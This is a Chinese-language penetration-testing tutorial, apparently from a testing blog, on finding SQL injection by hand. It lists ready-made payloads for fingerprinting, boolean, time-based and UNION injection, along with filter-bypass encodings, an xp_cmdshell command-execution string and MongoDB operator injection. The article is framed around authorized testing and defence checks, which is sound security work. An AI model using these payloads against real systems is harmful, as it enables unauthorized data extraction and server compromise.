SQL注入漏洞手工检测方法

1 漏洞原理与检测价值

SQL注入（SQL Injection）作为OWASP Top 10长期上榜的高危漏洞，其本质是攻击者通过构造特殊输入，改变原始SQL查询逻辑的代码注入技术。在自动化工具检测存在盲区的场景下，手工检测展现出不可替代的价值：

逻辑复杂性检测：针对业务规则紧密耦合的多条件查询语句

过滤绕过验证：当应用程序存在基础防护时的渗透测试

二次注入识别：从数据存储到检索使用的完整攻击链分析

2 手工检测方法体系

2.1 信息收集阶段

输入点枚举

显式参数：URL参数、表单字段、HTTP头部（Cookie/User-Agent）

隐式参数：RESTful API路径参数、JSON/XML请求体

文件操作：文件名参数、上传元数据字段

数据库指纹识别

/* 数据库类型判别 */
' AND '1'='1' -- 通用回真测试
' UNION SELECT 1, version() -- 版本信息获取
' OR @@version LIKE '%MySQL%' -- 数据库特征识别

2.2 注入类型检测

基于响应的检测技术

布尔型盲注

原始请求：id=1
攻击负载：id=1' AND '1'='1
id=1' AND '1'='2
观测点：页面内容差异/HTTP状态码变化

时间型盲注

/* MySQL时间延迟 */
' AND SLEEP(5) --
' UNION SELECT 1,2,BENCHMARK(1000000,MD5('test')) --

联合查询注入

' ORDER BY 5-- -- 确定字段数量
' UNION SELECT 1,2,database() -- 获取当前数据库
' UNION SELECT 1,table_name,3 FROM information_schema.tables --

2.3 绕过技术专项检测

编码绕过

URL编码：' → %27 → %2527

Unicode编码：' → %u0027

HTML实体：' → '

注释符变体

/* 多行注释 */
'/**/AND/**/1=1--
# 哈希注释（MySQL）
'%23 AND 1=1--

字符串拼接检测

' OR 'abc'='ab'||'c'--
' EXEC('SELECT' + ' * FROM users') --

3 深度检测技巧

3.1 错误信息分析

通过故意触发数据库错误获取技术信息：

' AND 1=CAST('test' AS INT) -- 类型转换错误
' AND 1 IN (SELECT column_name FROM info) -- 列名枚举

3.2 存储过程检测

针对使用存储过程的应用程序：

'; EXEC xp_cmdshell 'dir' --
' UNION SELECT 1,2 FROM OPENROWSET('SQLNCLI', ...) --

3.3 NoSQL注入检测

虽然非SQL数据库，但注入原理相似：

// MongoDB操作符注入
username[$ne]=null&password[$ne]=null
// JSON注入
{"$where": "this.credits - this.debits < 0"}

4 企业级测试流程

4.1 测试前准备

获取测试授权书与范围界定文档

准备测试用例库（包含正常/边界/异常用例）

搭建与生产环境一致的测试环境

4.2 测试执行规范

影响评估：每次注入前评估可能的数据破坏风险

数据备份：对关键业务数据执行备份操作

流量记录：使用Burp Suite等工具完整记录测试流量

问题复现：确保每个漏洞可稳定复现

4.3 结果报告要点

漏洞位置（URL、参数、触发条件）

攻击负载与完整请求/响应记录

风险等级评定（CVSS评分）

修复建议（参数化查询示例）

5 防御措施验证

手工检测完成后，应验证防护措施有效性：

输入验证测试

特殊字符过滤完整性（单引号、分号、注释符）

数据类型强制转换验证

长度限制绕过测试

纵深防御检测

WAF规则绕过测试

数据库权限最小化验证

日志审计完整性检查

精选文章

Python+Playwright+Pytest+BDD：利用FSM构建高效测试框架

软件测试进入“智能时代”：AI正在重塑质量体系

微服务架构下的契约测试实践